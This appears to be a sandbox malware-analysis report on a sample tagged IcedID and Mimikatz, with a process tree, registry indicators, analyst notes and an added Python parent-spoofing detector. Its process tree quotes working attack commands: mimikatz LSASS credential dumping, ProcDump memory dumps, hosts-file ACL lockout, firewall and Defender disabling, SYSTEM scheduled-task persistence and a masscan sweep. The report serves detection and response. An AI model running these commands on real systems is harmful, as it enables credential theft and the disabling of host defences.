Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"  kbejuig.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing  ligfuakbd.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  ligfuakbd.exe
-
Modifies registry class 14 IoCs
Processes:
description  ioc  process
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.js\  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\  kbejuig.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"  kbejuig.exe
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\  kbejuig.exe
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid   process
1612  kbejuig.exe (64 identical entries)
-
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid   process
664   (process name not recorded; 15 identical entries)
-
Suspicious behavior: RenamesItself 1 IoCs
Processes:
pid   process
800   2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe
-
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes (token / pid / process):
  SeDebugPrivilege
    800  2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe
    1688 kbejuig.exe
    1612 kbejuig.exe
    1144 vfshost.exe
    432, 4392, 2960, 4608, 3324, 3760, 372, 4072, 4948, 4856, 1100, 2600, 1604, 2412, 4540, 1144  ligfuakbd.exe (one request per dump run, 16 in total)
  SeLockMemoryPrivilege
    3260 kayllc.exe (requested twice)
SeDebugPrivilege is what a process needs to open another process's memory, so it is expected from the dumping tools (vfshost.exe, ligfuakbd.exe). SeLockMemoryPrivilege is needed to allocate large pages and is not something a dropper or scanner asks for; it is typical of CPU-bound workloads such as miners, which fits kayllc.exe being the one process parented to spoolsv.exe and kept alive by a scheduled task (see the process tree).
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes (pid / process / hook calls):
  800  2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe (2)
  1688 kbejuig.exe (2)
  1612 kbejuig.exe (2)
  4360 xohudmc.exe (1)
  1624 ogiqci.exe (1)
  4420 kbejuig.exe (2)
  5328 kbejuig.exe (2)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (parent -> child; the sandbox records each creation three times, and the list is capped at 64 entries, so the last pair is truncated):
  800  2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe -> 2084 cmd.exe
  2084 cmd.exe     -> 4332 PING.EXE
  2084 cmd.exe     -> 1688 kbejuig.exe
  1612 kbejuig.exe -> 4392 cmd.exe
  4392 cmd.exe     -> 456 cmd.exe
  4392 cmd.exe     -> 3000 cacls.exe
  4392 cmd.exe     -> 4892 cmd.exe
  4392 cmd.exe     -> 4320 cacls.exe
  4392 cmd.exe     -> 3184 cmd.exe
  1612 kbejuig.exe -> 1968 netsh.exe
  4392 cmd.exe     -> 4932 cacls.exe
  1612 kbejuig.exe -> 3796 netsh.exe
  1612 kbejuig.exe -> 4368 netsh.exe
  1612 kbejuig.exe -> 396 cmd.exe
  396  cmd.exe     -> 644 wpcap.exe
  644  wpcap.exe   -> 3876 net.exe
  3876 net.exe     -> 4436 net1.exe
  644  wpcap.exe   -> 184 net.exe
  184  net.exe     -> 4240 net1.exe
  644  wpcap.exe   -> 4220 net.exe
  4220 net.exe     -> 3684 net1.exe
  644  wpcap.exe   -> 3232 net.exe (list truncated here)
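The parent/child pairs above are what a process-tree view is built from, and the tree below places kayllc.exe (PID 3260) under spoolsv.exe (PID 2132) even though kbejuig.exe (PID 1612) is the process that created it (the NtCreateUserProcessOtherParentProcess flag on PID 1612). The following is an added example, not code from the sandbox or the sample: it reconstructs lineage from records that carry both the reported parent and the PID that actually issued the create call (a field an ETW or kernel-callback source exposes; the record layout and field names here are my own), flags the mismatch, and applies the weaker heuristic you are left with when only the reported parent is available. The records are constructed from PIDs and paths in this report.

```python
"""Lineage reconstruction and spoofed-parent check for process-creation records.

Added example; not part of the sandbox report or the sample. ProcRecord is an
assumed layout: reported_ppid is the parent the OS/tree shows, creator_pid is
the PID that issued the create call (0 = not observed). RECORDS is constructed
from this report's PIDs; SERVICE_IMAGES is my own short list of system
processes that should not be spawning binaries out of TEMP directories.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcRecord:
    pid: int
    image: str
    reported_ppid: int
    creator_pid: int


SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe")

# Constructed from the report: sample -> cmd -> {ping, kbejuig}; kbejuig.exe (1612)
# creates kayllc.exe with spoolsv.exe (2132) declared as its parent.
RECORDS = [
    ProcRecord(2132, r"C:\Windows\System32\spoolsv.exe", 0, 0),        # pre-existing service
    ProcRecord(800,  SAMPLE, 0, 0),                                     # launched by the sandbox
    ProcRecord(2084, r"C:\Windows\SysWOW64\cmd.exe", 800, 800),
    ProcRecord(4332, r"C:\Windows\SysWOW64\PING.EXE", 2084, 2084),
    ProcRecord(1688, r"C:\Windows\mitbajei\kbejuig.exe", 2084, 2084),
    ProcRecord(1612, r"C:\Windows\mitbajei\kbejuig.exe", 0, 0),        # root in the tree
    ProcRecord(3260, r"C:\Windows\TEMP\ycubiyfde\kayllc.exe", 2132, 1612),
    ProcRecord(4392, r"C:\Windows\SysWOW64\cmd.exe", 1612, 1612),
]

SERVICE_IMAGES = {"spoolsv.exe", "svchost.exe", "services.exe", "lsass.exe"}  # assumption


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def index(records):
    """pid -> record. Real telemetry reuses PIDs; key on (pid, start time) there."""
    return {r.pid: r for r in records}


def lineage(pid: int, by_pid, max_depth: int = 32):
    """Root-to-leaf image names following the *reported* parent chain.
    The seen-set guards against cycles that PID reuse can introduce."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen and len(chain) < max_depth:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.reported_ppid)
    return list(reversed(chain))


def spoofed_parents(records):
    """Records whose actual creator is known and differs from the reported parent."""
    return [r for r in records
            if r.creator_pid and r.reported_ppid and r.creator_pid != r.reported_ppid]


def service_children_from_temp(records):
    """Fallback when only the reported parent is available: a service process
    appearing to spawn an executable from a \\TEMP\\ path is worth a look."""
    by_pid = index(records)
    hits = []
    for r in records:
        parent = by_pid.get(r.reported_ppid)
        if parent is None:
            continue
        if basename(parent.image).lower() in SERVICE_IMAGES and "\\temp\\" in r.image.lower():
            hits.append(r)
    return hits


if __name__ == "__main__":
    by_pid = index(RECORDS)
    for r in spoofed_parents(RECORDS):
        print(f"PID {r.pid} {basename(r.image)}: reported parent {r.reported_ppid}, "
              f"actual creator {r.creator_pid}; tree shows {' > '.join(lineage(r.pid, by_pid))}")
    for r in service_children_from_temp(RECORDS):
        print(f"heuristic hit: {basename(by_pid[r.reported_ppid].image)} -> {r.image}")
```

The point of the two functions is the difference between them: `spoofed_parents` needs a telemetry source that records the caller of the create call, while `service_children_from_temp` works on ordinary process-creation logs but only catches the case where the spoofed parent is an unlikely one for the child's path.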
Processes
(reconstructed tree; [n] is the depth the sandbox recorded; the command line is shown only where it differs from the image path)

[1] PID 2132  C:\Windows\System32\spoolsv.exe
    [2] PID 3260  C:\Windows\TEMP\ycubiyfde\kayllc.exe
        cmdline: "C:\Windows\TEMP\ycubiyfde\kayllc.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
        note: the reported parent is spoolsv.exe, but the creator is kbejuig.exe (PID 1612, flagged NtCreateUserProcessOtherParentProcess below); lineage rules keyed on the reported parent will file this process under the print spooler.

[1] PID 800  C:\Users\Admin\AppData\Local\Temp\2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\2024-04-09_f44f00bd6fdabcab90742047cca0ba6a_hacktools_icedid_mimikatz.exe"
    - Drops file in Windows directory
    - Suspicious behavior: RenamesItself
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [2] PID 2084  C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mitbajei\kbejuig.exe
        - Suspicious use of WriteProcessMemory
        note: five pings to loopback is a short delay before the dropped copy starts; the sample renames itself meanwhile.
        [3] PID 4332  C:\Windows\SysWOW64\PING.EXE
            cmdline: ping 127.0.0.1 -n 5
            - Runs ping.exe
        [3] PID 1688  C:\Windows\mitbajei\kbejuig.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx

[1] PID 1612  C:\Windows\mitbajei\kbejuig.exe  (no parent recorded; everything that follows hangs off this process)
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Sets file execution options in registry
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [2] PID 4392  C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        - Suspicious use of WriteProcessMemory
        note: `echo Y|` answers cacls' "Are you sure (Y/N)?" prompt; /D denies Users, Administrators and SYSTEM on the hosts file, so hosts-based blocking or repair fails until an administrator takes ownership and resets the ACL (takeown /f, then icacls /reset).
        [3] PID 456   C:\Windows\SysWOW64\cmd.exe   cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        [3] PID 3000  C:\Windows\SysWOW64\cacls.exe cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
        [3] PID 4892  C:\Windows\SysWOW64\cmd.exe   cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        [3] PID 4320  C:\Windows\SysWOW64\cacls.exe cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
        [3] PID 3184  C:\Windows\SysWOW64\cmd.exe   cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        [3] PID 4932  C:\Windows\SysWOW64\cacls.exe cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    [2] PID 1968  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static del all
    [2] PID 3796  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add policy name=Bastards description=FuckingBastards
    [2] PID 4368  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add filteraction name=BastardsList action=block
        note: all existing IPsec policy is wiped and a policy "Bastards" with a block action is created; the filters added further down attach inbound TCP/UDP 139, 135 and 445 to it and assign it, so RPC, NetBIOS and SMB into the host are dropped. That also breaks the remote-administration paths (PsExec, WMI, admin shares) a responder would reach for; `netsh ipsec static show all` lists the policy and `netsh ipsec static del all` removes it.
    [2] PID 396   C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c C:\Windows\mfckutrue\tbejirgpe\wpcap.exe /S
        - Suspicious use of WriteProcessMemory
        [3] PID 644  C:\Windows\mfckutrue\tbejirgpe\wpcap.exe  cmdline: C:\Windows\mfckutrue\tbejirgpe\wpcap.exe /S
            - Drops file in Drivers directory
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in System32 directory
            - Drops file in Program Files directory
            - Suspicious use of WriteProcessMemory
            note: a silent (/S) packet-capture driver installer; the npf service it creates and restarts is the capture driver the scanners below use for raw sends, and the "Boundary Meter" / "TrueSight Meter" stops are the installer clearing the driver's existing consumers.
            [4] PID 3876  C:\Windows\SysWOW64\net.exe  cmdline: net stop "Boundary Meter"
                - Suspicious use of WriteProcessMemory
                [5] PID 4436  C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 stop "Boundary Meter"
            [4] PID 184   C:\Windows\SysWOW64\net.exe  cmdline: net stop "TrueSight Meter"
                - Suspicious use of WriteProcessMemory
                [5] PID 4240  C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 stop "TrueSight Meter"
            [4] PID 4220  C:\Windows\SysWOW64\net.exe  cmdline: net stop npf
                - Suspicious use of WriteProcessMemory
                [5] PID 3684  C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 stop npf
            [4] PID 3232  C:\Windows\SysWOW64\net.exe  cmdline: net start npf
                [5] PID 1972  C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 start npf
    [2] PID 636   C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c net start npf
        [3] PID 3932  C:\Windows\SysWOW64\net.exe   cmdline: net start npf
            [4] PID 4568  C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 start npf
    [2] PID 1624  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c net start npf
        [3] PID 3640  C:\Windows\SysWOW64\net.exe   cmdline: net start npf
            [4] PID 3736  C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 start npf
    [2] PID 3184  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c C:\Windows\mfckutrue\tbejirgpe\crtyfytge.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mfckutrue\tbejirgpe\Scant.txt
        [3] PID 1712  C:\Windows\mfckutrue\tbejirgpe\crtyfytge.exe  cmdline: C:\Windows\mfckutrue\tbejirgpe\crtyfytge.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mfckutrue\tbejirgpe\Scant.txt
            - Executes dropped EXE
            - Loads dropped DLL
            note: the argument form (-p <port> <range> --rate=<pps> -oJ <file>) is masscan's; this is a TCP/80 sweep of 222.186.128.0/17 (32,768 addresses) at 512 packets/s with JSON output, which is the source of the large outbound connection count.
    [2] PID 1884  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c C:\Windows\mfckutrue\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mfckutrue\Corporate\log.txt
        - Drops file in Windows directory
        [3] PID 1144  C:\Windows\mfckutrue\Corporate\vfshost.exe  cmdline: C:\Windows\mfckutrue\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            note: mimikatz's standard LSASS credential dump, renamed to vfshost.exe, with output appended to log.txt next to it; the file name is arbitrary, the module::command syntax is the durable indicator.
    [2] PID 2392  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ugtpugmje" /ru system /tr "cmd /c C:\Windows\ime\kbejuig.exe"
        [3] PID 4708  C:\Windows\SysWOW64\cmd.exe       cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        [3] PID 5044  C:\Windows\SysWOW64\schtasks.exe  cmdline: schtasks /create /sc minute /mo 1 /tn "ugtpugmje" /ru system /tr "cmd /c C:\Windows\ime\kbejuig.exe"
            - Creates scheduled task(s)
    [2] PID 4916  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bpgzmejug" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F"
        [3] PID 3060  C:\Windows\SysWOW64\cmd.exe       cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        [3] PID 912   C:\Windows\SysWOW64\schtasks.exe  cmdline: schtasks /create /sc minute /mo 1 /tn "bpgzmejug" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mitbajei\kbejuig.exe /p everyone:F"
            - Creates scheduled task(s)
    [2] PID 1276  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qbcryqppe" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F"
        [3] PID 3252  C:\Windows\SysWOW64\cmd.exe       cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        [3] PID 2092  C:\Windows\SysWOW64\schtasks.exe  cmdline: schtasks /create /sc minute /mo 1 /tn "qbcryqppe" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ycubiyfde\kayllc.exe /p everyone:F"
            - Creates scheduled task(s)
        note: three tasks run every minute as SYSTEM: one relaunches C:\Windows\ime\kbejuig.exe (a third copy of the dropper), the other two reset the ACL on the two payloads to Everyone:Full so a later run can overwrite them. The [1]-level cmd.EXE entries at the end of this tree are these tasks firing; remove the tasks (schtasks /delete /tn <name> /f) before the files or the files come back.
    [2] PID 2176  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
    [2] PID 4288  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
    [2] PID 4680  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
    [2] PID 4248  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static set policy name=Bastards assign=y
    [2] PID 632   C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
    [2] PID 2600  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
    [2] PID 5104  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
    [2] PID 1464  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static set policy name=Bastards assign=y
    [2] PID 432   C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 776 C:\Windows\TEMP\mfckutrue\776.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
        note: -accepteula -mp <pid> <file> is Sysinternals ProcDump syntax (mini-plus dump of the target's memory). Seventeen PIDs are dumped this way below, into C:\Windows\TEMP\mfckutrue\<pid>.dmp; only one of the targets (2132, spoolsv.exe) appears in this tree, so the other target images are not identifiable from the report alone. The "Modifies data under HKEY_USERS" flag on each run is ProcDump writing its EulaAccepted value.
    [2] PID 1752  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
    [2] PID 1712  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
    [2] PID 4608  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
    [2] PID 3324  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh ipsec static set policy name=Bastards assign=y
    [2] PID 804   C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c net stop SharedAccess
        [3] PID 4464  C:\Windows\SysWOW64\net.exe   cmdline: net stop SharedAccess
            [4] PID 912   C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 stop SharedAccess
    [2] PID 1824  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c netsh firewall set opmode mode=disable
        [3] PID 1984  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh firewall set opmode mode=disable
            - Modifies Windows Firewall
    [2] PID 4296  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c netsh Advfirewall set allprofiles state off
        [3] PID 1276  C:\Windows\SysWOW64\netsh.exe  cmdline: netsh Advfirewall set allprofiles state off
            - Modifies Windows Firewall
    [2] PID 4756  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c net stop MpsSvc
        [3] PID 1448  C:\Windows\SysWOW64\net.exe   cmdline: net stop MpsSvc
            [4] PID 4188  C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 stop MpsSvc
    [2] PID 4000  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c net stop WinDefend
        [3] PID 3412  C:\Windows\SysWOW64\net.exe   cmdline: net stop WinDefend
            [4] PID 4436  C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 stop WinDefend
    [2] PID 4580  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c net stop wuauserv
        [3] PID 1972  C:\Windows\SysWOW64\net.exe   cmdline: net stop wuauserv
            [4] PID 2304  C:\Windows\SysWOW64\net1.exe  cmdline: C:\Windows\system32\net1 stop wuauserv
    [2] PID 3312  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c sc config MpsSvc start= disabled
        [3] PID 2052  C:\Windows\SysWOW64\sc.exe  cmdline: sc config MpsSvc start= disabled
            - Launches sc.exe
    [2] PID 868   C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c sc config SharedAccess start= disabled
        [3] PID 644   C:\Windows\SysWOW64\sc.exe  cmdline: sc config SharedAccess start= disabled
            - Launches sc.exe
    [2] PID 3912  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c sc config WinDefend start= disabled
        [3] PID 4036  C:\Windows\SysWOW64\sc.exe  cmdline: sc config WinDefend start= disabled
            - Launches sc.exe
    [2] PID 3452  C:\Windows\SysWOW64\cmd.exe  cmdline: cmd /c sc config wuauserv start= disabled
        [3] PID 4128  C:\Windows\SysWOW64\sc.exe  cmdline: sc config wuauserv start= disabled
            - Launches sc.exe
        note: the firewall is switched off through both the legacy (netsh firewall) and current (netsh advfirewall) interfaces, then the firewall service (MpsSvc), ICS (SharedAccess), Defender (WinDefend) and Windows Update (wuauserv) are stopped and set to start= disabled so they stay down across reboots. On a current Windows 10 build, `net stop WinDefend` is refused while tamper protection is on; the sc config change is the one to check for in the ServiceStartType fields of the next boot.
    [2] PID 4360  C:\Windows\TEMP\xohudmc.exe
        - Executes dropped EXE
        - Drops file in System32 directory
        - Suspicious use of SetWindowsHookEx
    [2] PID 4392  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 1012 C:\Windows\TEMP\mfckutrue\1012.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 2960  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 2132 C:\Windows\TEMP\mfckutrue\2132.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 4608  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 2628 C:\Windows\TEMP\mfckutrue\2628.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 3324  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 2816 C:\Windows\TEMP\mfckutrue\2816.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 3760  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 2880 C:\Windows\TEMP\mfckutrue\2880.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 372   C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 3140 C:\Windows\TEMP\mfckutrue\3140.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 4072  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 3856 C:\Windows\TEMP\mfckutrue\3856.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 4948  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 3948 C:\Windows\TEMP\mfckutrue\3948.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 4856  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 4012 C:\Windows\TEMP\mfckutrue\4012.dmp
        - Executes dropped EXE
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
    [2] PID 1100  C:\Windows\TEMP\mfckutrue\ligfuakbd.exe  cmdline: C:\Windows\TEMP\mfckutrue\ligfuakbd.exe -accepteula -mp 4092 C:\Windows\TEMP\mfckutrue\4092.dmp
        - Executes dropped EXE
